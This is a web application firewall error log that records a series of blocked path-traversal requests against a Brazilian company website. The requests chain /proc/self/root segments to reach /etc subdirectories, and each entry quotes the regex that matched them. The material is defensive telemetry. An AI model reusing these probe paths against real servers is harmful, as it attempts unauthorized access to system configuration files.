[Wed Mar 18 06:45:21.719125 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:57794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Mcdf6f5d65gmYZSnvAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:22.998664 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:57802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0MuyqAr6etmhZHNqQtgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:24.778821 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:57804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0NCmAPhZkrhU8w4lC_QAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:26.046793 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:57806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0NtY0UrI5A3LftIxudgAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:28.652199 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:57808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0N-oXxyEfFpUF8f9B8gAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:29.951182 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:48958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Ofu8EFLIOrSqIpvaRwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:31.292170 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:48962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0O-w_le52K8_3pV21lAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:32.618159 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:48970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0POw_le52K8_3pV21lQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:33.922889 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:48972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0PdY0UrI5A3LftIxufwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:35.218826 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:48984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0P0zinOy1jxa1j4fn-QAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:36.026960 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:42596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0QNY0UrI5A3LftIxuhAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:45:36.505850 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:48992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0QEzinOy1jxa1j4fn-wAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:37.860705 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:49002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Qew_le52K8_3pV21mAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:39.131834 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:49012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0QymAPhZkrhU8w4lDBQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:40.434030 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:35476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0RNY0UrI5A3LftIxuiQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:43.368519 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:35480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0RymAPhZkrhU8w4lDBwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:44.687362 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:35496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0SOoXxyEfFpUF8f9B9gAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:46.075445 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:35510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0Svu8EFLIOrSqIpvaSgAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:48.343716 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:35520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0S-yqAr6etmhZHNqQxQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:45:50.809403 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:55594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0TuyqAr6etmhZHNqQyQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:45:52.051095 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:55598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0UOoXxyEfFpUF8f9B-gAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:45:53.767531 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:55606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0UQkwaGbbGflqUZDl0wAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:45:56.339085 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:55610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp0VAkwaGbbGflqUZDl2gAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
